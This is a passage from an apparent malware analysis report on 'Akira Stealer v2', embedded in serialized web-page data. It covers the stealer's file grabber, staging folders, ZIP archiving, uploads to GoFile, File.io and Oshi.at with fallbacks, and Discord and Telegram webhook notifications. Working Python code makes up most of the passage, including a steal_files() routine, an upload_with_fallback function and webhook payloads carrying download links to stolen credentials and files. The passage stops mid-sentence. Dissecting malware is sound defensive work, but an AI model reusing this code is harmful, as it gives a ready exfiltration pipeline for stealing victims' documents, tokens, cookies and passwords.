\".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n    \".jpg\", \".png\"\n]\n",[63,17248,17249,17254,17259,17264],{"__ignoreMap":65},[102,17250,17251],{"class":104,"line":105},[102,17252,17253],{},"allowed_extensions = [\n",[102,17255,17256],{"class":104,"line":111},[102,17257,17258],{},"    \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n",[102,17260,17261],{"class":104,"line":329},[102,17262,17263],{},"    \".jpg\", \".png\"\n",[102,17265,17266],{"class":104,"line":346},[102,17267,15585],{},[186,17269,17271],{"id":17270},"_7113-size-constraint","7.11.3 Size Constraint",[12,17273,192],{},[12,17275,17276],{},"Files larger than 2 megabytes are skipped to optimize exfiltration speed and avoid large transfers:",[56,17278,17280],{"className":12155,"code":17279,"language":12157,"meta":65,"style":65},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\nif file_size_mb \u003C= 2:\n    # eligible for copy\n",[63,17281,17282,17287,17292],{"__ignoreMap":65},[102,17283,17284],{"class":104,"line":105},[102,17285,17286],{},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\n",[102,17288,17289],{"class":104,"line":111},[102,17290,17291],{},"if file_size_mb \u003C= 2:\n",[102,17293,17294],{"class":104,"line":329},[102,17295,17296],{},"    # eligible for copy\n",[186,17298,17300],{"id":17299},"_7114-recursive-scanning-copy-logic","7.11.4 Recursive Scanning & Copy Logic",[12,17302,192],{},[12,17304,17305],{},"Once the high-value directories have been identified, Akira initiates a recursive scanning routine to traverse subfolders and locate files matching specific keywords and extensions. This phase is built for precision and stealth: only files that match pre-defined criteria—such as filenames containing sensitive keywords and approved filetypes—are considered. The logic ensures that only relevant, user-generated content is exfiltrated. It ignores system files, caches, and binaries, and limits the size of any single file to 2 MB to reduce upload size and detection risk. This scanning method is silent, efficient, and optimized for stealthy data theft in real-world environments. By copying matching files into a staging folder and maintaining a list of what was taken, Akira prepares the content for bundling and exfiltration—while minimizing duplication and operational noise.",[12,17307,17308,17309,17312],{},"The core routine ",[63,17310,17311],{},"steal_files()"," operates as follows:",[56,17314,17316],{"className":12155,"code":17315,"language":12157,"meta":65,"style":65},"@staticmethod\ndef steal_files():\n    stolen_files = set()\n    temp_folder = Utils.get_temp_folder()\n\n    for folder in searchFolders:\n        current_path = os.path.join(os.environ['USERPROFILE'], folder)\n        if os.path.exists(current_path):\n            for root, _, files in os.walk(current_path):\n                for file in files:\n                    lower = file.lower()\n                    # Keyword check\n                    if any(keyword in lower for keyword in keywordsFiles):\n                        ext = os.path.splitext(lower)[1]\n                        # Extension and size check\n                        if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n                            # Prepare destination\n                            files_dir = os.path.join(temp_folder, \"Files\")\n                            os.makedirs(files_dir, exist_ok=True)\n                            shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n                            stolen_files.add(file)\n    data.stolen_files.extend(stolen_files)\n",[63,17317,17318,17322,17327,17332,17337,17341,17346,17351,17356,17361,17366,17371,17376,17381,17386,17391,17396,17401,17406,17411,17416,17421],{"__ignoreMap":65},[102,17319,17320],{"class":104,"line":105},[102,17321,12644],{},[102,17323,17324],{"class":104,"line":111},[102,17325,17326],{},"def steal_files():\n",[102,17328,17329],{"class":104,"line":329},[102,17330,17331],{},"    stolen_files = set()\n",[102,17333,17334],{"class":104,"line":346},[102,17335,17336],{},"    temp_folder = Utils.get_temp_folder()\n",[102,17338,17339],{"class":104,"line":650},[102,17340,11519],{"emptyLinePlaceholder":2181},[102,17342,17343],{"class":104,"line":656},[102,17344,17345],{},"    for folder in searchFolders:\n",[102,17347,17348],{"class":104,"line":662},[102,17349,17350],{},"        current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[102,17352,17353],{"class":104,"line":668},[102,17354,17355],{},"        if os.path.exists(current_path):\n",[102,17357,17358],{"class":104,"line":674},[102,17359,17360],{},"            for root, _, files in os.walk(current_path):\n",[102,17362,17363],{"class":104,"line":680},[102,17364,17365],{},"                for file in files:\n",[102,17367,17368],{"class":104,"line":12692},[102,17369,17370],{},"                    lower = file.lower()\n",[102,17372,17373],{"class":104,"line":12698},[102,17374,17375],{},"                    # Keyword check\n",[102,17377,17378],{"class":104,"line":12704},[102,17379,17380],{},"                    if any(keyword in lower for keyword in keywordsFiles):\n",[102,17382,17383],{"class":104,"line":12710},[102,17384,17385],{},"                        ext = os.path.splitext(lower)[1]\n",[102,17387,17388],{"class":104,"line":12716},[102,17389,17390],{},"                        # Extension and size check\n",[102,17392,17393],{"class":104,"line":12722},[102,17394,17395],{},"                        if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n",[102,17397,17398],{"class":104,"line":12728},[102,17399,17400],{},"                            # Prepare destination\n",[102,17402,17403],{"class":104,"line":12734},[102,17404,17405],{},"                            files_dir = os.path.join(temp_folder, \"Files\")\n",[102,17407,17408],{"class":104,"line":12740},[102,17409,17410],{},"                            os.makedirs(files_dir, exist_ok=True)\n",[102,17412,17413],{"class":104,"line":12746},[102,17414,17415],{},"                            shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n",[102,17417,17418],{"class":104,"line":12752},[102,17419,17420],{},"                            stolen_files.add(file)\n",[102,17422,17423],{"class":104,"line":12758},[102,17424,17425],{},"    data.stolen_files.extend(stolen_files)\n",[12,17427,17428],{},[251,17429,17430],{},"Key points:",[3259,17432,17433,17441,17450,17459,17465],{},[1257,17434,17435,17440],{},[251,17436,17437],{},[63,17438,17439],{},"os.walk",": Recursively descends into subdirectories.",[1257,17442,17443,17446,17447,1013],{},[251,17444,17445],{},"Case-insensitive matching",": Filenames are normalized via ",[63,17448,17449],{},"lower()",[1257,17451,17452,17455,17456,17458],{},[251,17453,17454],{},"Atomic copy",": Uses ",[63,17457,15451],{}," to preserve file content.",[1257,17460,17461,17464],{},[251,17462,17463],{},"Set of stolen filenames",": Prevents duplicate copies when the same file appears twice.",[1257,17466,17467,1061,17472,17475],{},[251,17468,17469,17470],{},"Integration with ",[63,17471,16728],{},[63,17473,17474],{},"data.stolen_files"," accumulates the stolen file list for later reporting.",[186,17477,17479],{"id":17478},"_7115-archiving-and-exfiltration","7.11.5 Archiving and Exfiltration",[12,17481,192],{},[12,17483,17484,17485,17487],{},"After collection, the ",[63,17486,15933],{}," folder is zipped and dispatched:",[56,17489,17491],{"className":12155,"code":17490,"language":12157,"meta":65,"style":65},"# Archive\nUtils.zip_client_file()  # creates CLIENT.zip from temp_folder\n\n# Upload & Notify\nakira.sendFilesTG(Utils.get_temp_folder(), startup)\nhook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[63,17492,17493,17498,17503,17507,17512,17517],{"__ignoreMap":65},[102,17494,17495],{"class":104,"line":105},[102,17496,17497],{},"# Archive\n",[102,17499,17500],{"class":104,"line":111},[102,17501,17502],{},"Utils.zip_client_file()  # creates CLIENT.zip from temp_folder\n",[102,17504,17505],{"class":104,"line":329},[102,17506,11519],{"emptyLinePlaceholder":2181},[102,17508,17509],{"class":104,"line":346},[102,17510,17511],{},"# Upload & Notify\n",[102,17513,17514],{"class":104,"line":650},[102,17515,17516],{},"akira.sendFilesTG(Utils.get_temp_folder(), startup)\n",[102,17518,17519],{"class":104,"line":656},[102,17520,17521],{},"hook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[1254,17523,17524,17539],{},[1257,17525,17526,17531,17532,805,17534,805,17536,11558],{},[251,17527,17528],{},[63,17529,17530],{},"zip_client_file()",": Compresses the entire temp directory, including ",[63,17533,15933],{},[63,17535,13987],{},[63,17537,17538],{},"Passwords",[1257,17540,17541,17545,17546],{},[251,17542,17543],{},[63,17544,16709],{},": Posts the download link via Telegram or Discord webhook, listing each stolen filename:",[56,17547,17549],{"className":12155,"code":17548,"language":12157,"meta":65,"style":65},"fields.append({\n\"name\": \"📂 Files\",\n\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n\"inline\": False\n})\n",[63,17550,17551,17556,17561,17566,17571],{"__ignoreMap":65},[102,17552,17553],{"class":104,"line":105},[102,17554,17555],{},"fields.append({\n",[102,17557,17558],{"class":104,"line":111},[102,17559,17560],{},"\"name\": \"📂 Files\",\n",[102,17562,17563],{"class":104,"line":329},[102,17564,17565],{},"\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n",[102,17567,17568],{"class":104,"line":346},[102,17569,17570],{},"\"inline\": False\n",[102,17572,17573],{"class":104,"line":650},[102,17574,17575],{},"})\n",[12,17577,17578],{},[251,17579,17580],{},"Conclusion:",[12,17582,17583],{},"The File Grabber in Akira Stealer v2 systematically hunts for sensitive documents using keyword and extension filters, respects a 2 MB size cap for efficiency, and consolidates stolen items into an archive. Its design ensures both breadth (multiple folders) and precision (targeted filters), making it one of the most impactful stages of the malware’s lifecycle.",[41,17585,17587],{"id":17586},"_712-exfiltration-strategy","7.12 Exfiltration Strategy",[12,17589,47],{},[12,17591,17592],{},"The exfiltration module handles harvested tokens and additional artifacts (cookies, autofills, logs) by staging them in a structured directory, compressing into an archive, uploading to multiple online file hosts, and sending detailed webhook notifications. This section deconstructs each step with file paths, domain endpoints, and code references for full traceability.",[186,17594,17596],{"id":17595},"_7121-directory-layout-filenames","7.12.1 Directory Layout & Filenames",[12,17598,192],{},[12,17600,17601],{},"Akira organizes all collected artifacts into a clean and hierarchical temporary directory structure. This design allows for efficient packaging and easy post-exfiltration review by the attacker. Each data category—such as Tokens, Cookies, Passwords, or Screenshots—is stored in its own subfolder under a root path named after the victim’s computer (e.g., DESKTOP1234). This structured layout ensures clarity, minimizes duplication, and streamlines the archiving and upload process. It also makes automated parsing or manual inspection much easier on the attacker side.",[56,17603,17606],{"className":17604,"code":17605,"language":61},[59],"C:\\Users\\User\\AppData\\Local\\Temp\\DESKTOP1234\\\n├─ Tokens\\\n│   ├ token_ab12cd34.txt\n│   └ token_ef56gh78.txt\n├─ Cookies\\\n│   ├ Chrome_Cookies.txt\n│   └ Discord_Cookies.txt\n├─ Autofill\\\n├─ Passwords\\\n├─ Logs\\\n└─ Screenshots\\\n",[63,17607,17605],{"__ignoreMap":65},[186,17609,17611],{"id":17610},"_7122-token-artifact-staging","7.12.2 Token & Artifact Staging",[12,17613,192],{},[12,17615,17616],{},"Before exfiltration, Akira stages all relevant artifacts in the corresponding subfolders. Token values, for instance, are written into individual .txt files to facilitate quick scanning and validation. Cookies, autofill entries, and passwords are similarly written into structured text files named by browser. This step standardizes the data layout, enabling automated tooling to track what was harvested. It also ensures that the zip archive later reflects a predictable and attacker-friendly format, regardless of which modules were triggered.",[56,17618,17620],{"className":12155,"code":17619,"language":12157,"meta":65,"style":65},"import os, shutil\n# Constants\nTMP = os.getenv('TEMP')\nROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n# Prepare structure\nfor sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n    os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n# Save token\nwith open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n    f.write(token)\n",[63,17621,17622,17627,17632,17637,17642,17647,17652,17657,17662,17667],{"__ignoreMap":65},[102,17623,17624],{"class":104,"line":105},[102,17625,17626],{},"import os, shutil\n",[102,17628,17629],{"class":104,"line":111},[102,17630,17631],{},"# Constants\n",[102,17633,17634],{"class":104,"line":329},[102,17635,17636],{},"TMP = os.getenv('TEMP')\n",[102,17638,17639],{"class":104,"line":346},[102,17640,17641],{},"ROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n",[102,17643,17644],{"class":104,"line":650},[102,17645,17646],{},"# Prepare structure\n",[102,17648,17649],{"class":104,"line":656},[102,17650,17651],{},"for sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n",[102,17653,17654],{"class":104,"line":662},[102,17655,17656],{},"    os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n",[102,17658,17659],{"class":104,"line":668},[102,17660,17661],{},"# Save token\n",[102,17663,17664],{"class":104,"line":674},[102,17665,17666],{},"with open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n",[102,17668,17669],{"class":104,"line":680},[102,17670,17671],{},"    f.write(token)\n",[1254,17673,17674,17677],{},[1257,17675,17676],{},"Tokens saved in separate small text files for quick inspection.",[1257,17678,17679,17680,17683,17684,1013],{},"Cookie dumps from ",[63,17681,17682],{},"Chromium.GetCookies()"," written to ",[63,17685,17686],{},"{Browser}_Cookies.txt",[186,17688,17690],{"id":17689},"_7133-zip-archive-creation","7.13.3 ZIP Archive Creation",[12,17692,192],{},[12,17694,17695,17696],{},"Once staging is complete, Akira compresses the entire directory into a single ZIP archive. The archive filename follows a consistent naming convention: ",[17697,17698,17699,17700],"computer-name",{},"_",[17701,17702,17703],"timestamp",{},".zip, using the host’s machine name and a UTC timestamp in ISO 8601 format. This ensures both uniqueness and chronological traceability. By walking the entire staging directory recursively, every file is preserved in its relative structure within the ZIP. This format simplifies bulk retrieval and inspection by attackers, especially if hundreds of victims are compromised in parallel.",[56,17705,17707],{"className":12155,"code":17706,"language":12157,"meta":65,"style":65},"import zipfile, datetime\n\ndef create_archive(root_dir: str) -> str:\n    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n        for dirpath, _, files in os.walk(root_dir):\n            for fname in files:\n                full = os.path.join(dirpath, fname)\n                rel = os.path.relpath(full, root_dir)\n                zf.write(full, rel)\n    return zip_path\n",[63,17708,17709,17714,17718,17723,17728,17733,17738,17743,17748,17753,17758,17763,17768],{"__ignoreMap":65},[102,17710,17711],{"class":104,"line":105},[102,17712,17713],{},"import zipfile, datetime\n",[102,17715,17716],{"class":104,"line":111},[102,17717,11519],{"emptyLinePlaceholder":2181},[102,17719,17720],{"class":104,"line":329},[102,17721,17722],{},"def create_archive(root_dir: str) -> str:\n",[102,17724,17725],{"class":104,"line":346},[102,17726,17727],{},"    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n",[102,17729,17730],{"class":104,"line":650},[102,17731,17732],{},"    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n",[102,17734,17735],{"class":104,"line":656},[102,17736,17737],{},"    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n",[102,17739,17740],{"class":104,"line":662},[102,17741,17742],{},"    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n",[102,17744,17745],{"class":104,"line":668},[102,17746,17747],{},"        for dirpath, _, files in os.walk(root_dir):\n",[102,17749,17750],{"class":104,"line":674},[102,17751,17752],{},"            for fname in files:\n",[102,17754,17755],{"class":104,"line":680},[102,17756,17757],{},"                full = os.path.join(dirpath, fname)\n",[102,17759,17760],{"class":104,"line":12692},[102,17761,17762],{},"                rel = os.path.relpath(full, root_dir)\n",[102,17764,17765],{"class":104,"line":12698},[102,17766,17767],{},"                zf.write(full, rel)\n",[102,17769,17770],{"class":104,"line":12704},[102,17771,17772],{},"    return zip_path\n",[1254,17774,17775],{},[1257,17776,17777,17778,17781],{},"Archive named ",[63,17779,17780],{},"DESKTOP1234_20250505T123456Z.zip"," for host coherence.",[12,17783,17784],{},[251,17785,17786],{},"ZIP Filename Convention",[12,17788,17789],{},"The archive is named using the compromised host’s computer name followed by a UTC timestamp in ISO format, ensuring uniqueness and chronological order.",[56,17791,17793],{"className":12155,"code":17792,"language":12157,"meta":65,"style":65},"import datetime, os\n\ndef create_archive(root_dir: str) -> str:\n    # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n    # Construct ZIP filename: \u003CComputerName>_\u003CTimestamp>.zip\n    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n    return zip_path\n",[63,17794,17795,17800,17804,17808,17813,17817,17822,17826,17830],{"__ignoreMap":65},[102,17796,17797],{"class":104,"line":105},[102,17798,17799],{},"import datetime, os\n",[102,17801,17802],{"class":104,"line":111},[102,17803,11519],{"emptyLinePlaceholder":2181},[102,17805,17806],{"class":104,"line":329},[102,17807,17722],{},[102,17809,17810],{"class":104,"line":346},[102,17811,17812],{},"    # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n",[102,17814,17815],{"class":104,"line":650},[102,17816,17727],{},[102,17818,17819],{"class":104,"line":656},[102,17820,17821],{},"    # Construct ZIP filename: \u003CComputerName>_\u003CTimestamp>.zip\n",[102,17823,17824],{"class":104,"line":662},[102,17825,17732],{},[102,17827,17828],{"class":104,"line":668},[102,17829,17737],{},[102,17831,17832],{"class":104,"line":674},[102,17833,17772],{},[12,17835,17789],{},[186,17837,17839],{"id":17838},"_7144-upload-workflow","7.14.4 Upload Workflow",[12,17841,192],{},[12,17843,17844],{},"Akira uses a three-tier upload strategy to maximize the chance of successful data exfiltration. It first attempts to upload the archive to GoFile.io using their public API, which returns a download link. If GoFile is unavailable or blocked, it falls back to File.io and then Oshi.at, ensuring the data is always transferred. These services provide anonymous, short-lived hosting, which makes takedown and traceability difficult. The script captures the final download URL and prepares it for webhook delivery.",[3259,17846,17847,17879,17906],{},[1257,17848,17849,17852],{},[251,17850,17851],{},"Primary: GoFile.io",[1254,17853,17854,17862,17870],{},[1257,17855,17856,1061,17859],{},[251,17857,17858],{},"API to fetch servers",[63,17860,17861],{},"GET https://api.gofile.io/servers",[1257,17863,17864,1061,17867],{},[251,17865,17866],{},"Upload endpoint",[63,17868,17869],{},"POST https://\u003Cserver>.gofile.io/contents/uploadfile",[1257,17871,17872,1061,17875,17878],{},[251,17873,17874],{},"Response field",[63,17876,17877],{},"data.downloadPage"," contains final URL.",[1257,17880,17881,17884],{},[251,17882,17883],{},"Fallback #1: File.io",[1254,17885,17886,17896],{},[1257,17887,17888,1061,17890,8957,17893],{},[251,17889,17866],{},[63,17891,17892],{},"POST https://file.io/",[63,17894,17895],{},"files={'file': open(...)}",[1257,17897,17898,17901,17902,17905],{},[251,17899,17900],{},"Response",": JSON ",[63,17903,17904],{},"link"," field.",[1257,17907,17908,17911],{},[251,17909,17910],{},"Fallback #2: Oshi.at",[1254,17912,17913,17927],{},[1257,17914,17915,1061,17917,8957,17920,17923,17924,1013],{},[251,17916,17866],{},[63,17918,17919],{},"POST http://oshi.at/",[63,17921,17922],{},"files[]"," and parameters ",[63,17925,17926],{},"expire=43200, autodestroy=0",[1257,17928,17929,17931,17932,1013],{},[251,17930,17900],{},": Plain text containing ",[63,17933,17934],{},"DL: \u003Curl>",[12,17936,17937],{},[251,17938,17939],{},"Implementation Snippet:",[56,17941,17943],{"className":12155,"code":17942,"language":12157,"meta":65,"style":65},"import requests\n\ndef upload_with_fallback(zip_path):\n    # GoFile\n    try:\n        servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n        for srv in servers:\n            try:\n                r = requests.post(\n                    f'https://{srv}.gofile.io/contents/uploadfile',\n                    files={'file': open(zip_path,'rb')}, timeout=20)\n                url = r.json()['data']['downloadPage']\n                if url: return url\n            except: continue\n    except: pass\n    # File.io\n    try:\n        r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n        return r.json().get('link','')\n    except: pass\n    # Oshi.at\n    try:\n        text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n        return text.split('DL: ')[1].strip()\n    except: pass\n    return ''\n",[63,17944,17945,17950,17954,17959,17964,17968,17973,17978,17983,17988,17993,17998,18003,18008,18013,18018,18023,18027,18032,18037,18041,18046,18050,18055,18060,18064],{"__ignoreMap":65},[102,17946,17947],{"class":104,"line":105},[102,17948,17949],{},"import requests\n",[102,17951,17952],{"class":104,"line":111},[102,17953,11519],{"emptyLinePlaceholder":2181},[102,17955,17956],{"class":104,"line":329},[102,17957,17958],{},"def upload_with_fallback(zip_path):\n",[102,17960,17961],{"class":104,"line":346},[102,17962,17963],{},"    # GoFile\n",[102,17965,17966],{"class":104,"line":650},[102,17967,12807],{},[102,17969,17970],{"class":104,"line":656},[102,17971,17972],{},"        servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n",[102,17974,17975],{"class":104,"line":662},[102,17976,17977],{},"        for srv in servers:\n",[102,17979,17980],{"class":104,"line":668},[102,17981,17982],{},"            try:\n",[102,17984,17985],{"class":104,"line":674},[102,17986,17987],{},"                r = requests.post(\n",[102,17989,17990],{"class":104,"line":680},[102,17991,17992],{},"                    f'https://{srv}.gofile.io/contents/uploadfile',\n",[102,17994,17995],{"class":104,"line":12692},[102,17996,17997],{},"                    files={'file': open(zip_path,'rb')}, timeout=20)\n",[102,17999,18000],{"class":104,"line":12698},[102,18001,18002],{},"                url = r.json()['data']['downloadPage']\n",[102,18004,18005],{"class":104,"line":12704},[102,18006,18007],{},"                if url: return url\n",[102,18009,18010],{"class":104,"line":12710},[102,18011,18012],{},"            except: continue\n",[102,18014,18015],{"class":104,"line":12716},[102,18016,18017],{},"    except: pass\n",[102,18019,18020],{"class":104,"line":12722},[102,18021,18022],{},"    # File.io\n",[102,18024,18025],{"class":104,"line":12728},[102,18026,12807],{},[102,18028,18029],{"class":104,"line":12734},[102,18030,18031],{},"        r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n",[102,18033,18034],{"class":104,"line":12740},[102,18035,18036],{},"        return r.json().get('link','')\n",[102,18038,18039],{"class":104,"line":12746},[102,18040,18017],{},[102,18042,18043],{"class":104,"line":12752},[102,18044,18045],{},"    # Oshi.at\n",[102,18047,18048],{"class":104,"line":12758},[102,18049,12807],{},[102,18051,18052],{"class":104,"line":12764},[102,18053,18054],{},"        text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n",[102,18056,18057],{"class":104,"line":12770},[102,18058,18059],{},"        return text.split('DL: ')[1].strip()\n",[102,18061,18062],{"class":104,"line":12776},[102,18063,18017],{},[102,18065,18066],{"class":104,"line":13442},[102,18067,18068],{},"    return ''\n",[186,18070,18072],{"id":18071},"_7155-webhook-alerts-attacker-retrieval-analyst-visibility-limits","7.15.5 Webhook Alerts, Attacker Retrieval & Analyst Visibility Limits",[12,18074,192],{},[12,18076,18077],{},"After uploading the ZIP archive, Akira sends a webhook notification—typically to Discord or Telegram—with a structured embed containing detailed information: number of stolen tokens, cookie count, file size, and a clickable download link. This gives attackers immediate feedback and retrieval access. To ensure reliability, a plaintext fallback message is also sent, containing just the archive link. This redundancy guarantees delivery, even if the embed is blocked by the platform or filtered. From the defender’s perspective, these communications are often invisible unless outbound network monitoring is in place.",[12,18079,18080],{},[251,18081,18082],{},"Embed Notification",[56,18084,18086],{"className":12155,"code":18085,"language":12157,"meta":65,"style":65},"# Build embed with key metadata\ntoken_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\nfields = [\n    {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n    {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n    {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n    {'name':'🍪 Cookies','value':str(data.cookie_count),'inline':True},\n    {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n]\npayload = {\n    'username':'Akira 💊',\n    'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n}\nrequests.post(webhook_url, json=payload, timeout=8)\n",[63,18087,18088,18093,18098,18103,18108,18113,18118,18123,18128,18132,18137,18142,18147,18151],{"__ignoreMap":65},[102,18089,18090],{"class":104,"line":105},[102,18091,18092],{},"# Build embed with key metadata\n",[102,18094,18095],{"class":104,"line":111},[102,18096,18097],{},"token_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\n",[102,18099,18100],{"class":104,"line":329},[102,18101,18102],{},"fields = [\n",[102,18104,18105],{"class":104,"line":346},[102,18106,18107],{},"    {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n",[102,18109,18110],{"class":104,"line":650},[102,18111,18112],{},"    {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n",[102,18114,18115],{"class":104,"line":656},[102,18116,18117],{},"    {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n",[102,18119,18120],{"class":104,"line":662},[102,18121,18122],{},"    {'name':'🍪 Cookies','value':str(data.cookie_count),'inline':True},\n",[102,18124,18125],{"class":104,"line":668},[102,18126,18127],{},"    {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n",[102,18129,18130],{"class":104,"line":674},[102,18131,15585],{},[102,18133,18134],{"class":104,"line":680},[102,18135,18136],{},"payload = {\n",[102,18138,18139],{"class":104,"line":12692},[102,18140,18141],{},"    'username':'Akira 💊',\n",[102,18143,18144],{"class":104,"line":12698},[102,18145,18146],{},"    'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n",[102,18148,18149],{"class":104,"line":12704},[102,18150,10086],{},[102,18152,18153],{"class":104,"line":12710},[102,18154,18155],{},"requests.post(webhook_url, json=payload, timeout=8)\n",[1254,18157,18158,18164],{},[1257,18159,18160,18163],{},[251,18161,18162],{},"Delivery",": Sent to the attacker’s Discord/Telegram channel.",[1257,18165,18166,18169,18170,18173],{},[251,18167,18168],{},"Embed Link",": Contains a clickable ",[63,18171,18172],{},"download_url"," pointing to the ZIP on GoFile (or fallback host).",[12,18175,18176],{},[251,18177,18178],{},"Raw Link Fallback",[56,18180,18182],{"className":12155,"code":18181,"language":12157,"meta":65,"style":65},"# Ensure attacker always has direct URL, even if embeds fail\nmessage = f\"📥 Archive available at: {download_url}\"\nrequests.post(webhook_url, data={'message': message}, timeout=8)\n",[63,18183,18184,18189,18194],{"__ignoreMap":65},[102,18185,18186],{"class":104,"line":105},[102,18187,18188],{},"# Ensure attacker always has direct URL, even if embeds fail\n",[102,18190,18191],{"class":104,"line":111},[102,18192,18193],{},"message = f\"📥 Archive available at: {download_url}\"\n",[102,18195,18196],{"class":104,"line":329},[102,18197,18198],{},"requests.post(webhook_url, data={'message': message}, timeout=8)\n",[1254,18200,18201],{},[1257,18202,18203,18206],{},[251,18204,18205],{},"Plain Text",": Guarantees delivery of the link in case embeds are blocked or silently dropped.",[12,18208,18209],{},[251,18210,18211],{},"How the Attacker Retrieves the Link",[12,18213,18214,18217],{},[251,18215,18216],{},"1. Webhook Infrastructure","\nThe attacker embeds the webhook endpoint in the malware configuration:",[56,18219,18221],{"className":12155,"code":18220,"language":12157,"meta":65,"style":65},"# at class initialization\nself.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[63,18222,18223,18228],{"__ignoreMap":65},[102,18224,18225],{"class":104,"line":105},[102,18226,18227],{},"# at class initialization\n",[102,18229,18230],{"class":104,"line":111},[102,18231,18232],{},"self.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[1254,18234,18235,18242],{},[1257,18236,18237,1061,18239],{},[251,18238,9018],{},[63,18240,18241],{},"https://discord.com/api/webhooks/\u003CWEBHOOK_ID>/\u003CWEBHOOK_TOKEN>",[1257,18243,18244,1061,18247],{},[251,18245,18246],{},"Telegram",[63,18248,18249],{},"https://api.telegram.org/bot\u003CTELEGRAM_TOKEN>/sendMessage",[12,18251,18252,18255],{},[251,18253,18254],{},"2. Real-Time Delivery","\nImmediately after a successful file upload, the malware executes:",[56,18257,18259],{"className":12155,"code":18258,"language":12157,"meta":65,"style":65},"payload = {\n  'username': 'Akira 💊',\n  'embeds': [{\n      'title': '🗄️ Exfiltration Complete',\n      'fields': [\n          {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n      ]\n  }]\n}\n# Transmit the archive URL entirely in the JSON body\nrequests.post(self.default_webhook, json=payload, timeout=8)\n",[63,18260,18261,18265,18270,18275,18280,18285,18290,18295,18300,18304,18309],{"__ignoreMap":65},[102,18262,18263],{"class":104,"line":105},[102,18264,18136],{},[102,18266,18267],{"class":104,"line":111},[102,18268,18269],{},"  'username': 'Akira 💊',\n",[102,18271,18272],{"class":104,"line":329},[102,18273,18274],{},"  'embeds': [{\n",[102,18276,18277],{"class":104,"line":346},[102,18278,18279],{},"      'title': '🗄️ Exfiltration Complete',\n",[102,18281,18282],{"class":104,"line":650},[102,18283,18284],{},"      'fields': [\n",[102,18286,18287],{"class":104,"line":656},[102,18288,18289],{},"          {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n",[102,18291,18292],{"class":104,"line":662},[102,18293,18294],{},"      ]\n",[102,18296,18297],{"class":104,"line":668},[102,18298,18299],{},"  }]\n",[102,18301,18302],{"class":104,"line":674},[102,18303,10086],{},[102,18305,18306],{"class":104,"line":680},[102,18307,18308],{},"# Transmit the archive URL entirely in the JSON body\n",[102,18310,18311],{"class":104,"line":12692},[102,18312,18313],{},"requests.post(self.default_webhook, json=payload, timeout=8)\n",[1254,18315,18316,18324],{},[1257,18317,399,18318,18320,18321,1013],{},[63,18319,18172],{}," variable is interpolated into the embed’s ",[63,18322,18323],{},"fields.value",[1257,18325,18326,18327,18329,18330,9890],{},"For Telegram fallback, the ",[63,18328,18172],{}," appears in the plain-text ",[63,18331,2233],{},[12,18333,18334],{},[251,18335,18336],{},"3. EDR & Forensic Visibility Limitations",[1254,18338,18339,18348],{},[1257,18340,18341,18344,18345,18347],{},[251,18342,18343],{},"No Local Logging",": The malware does not write the ",[63,18346,18172],{}," to disk or system 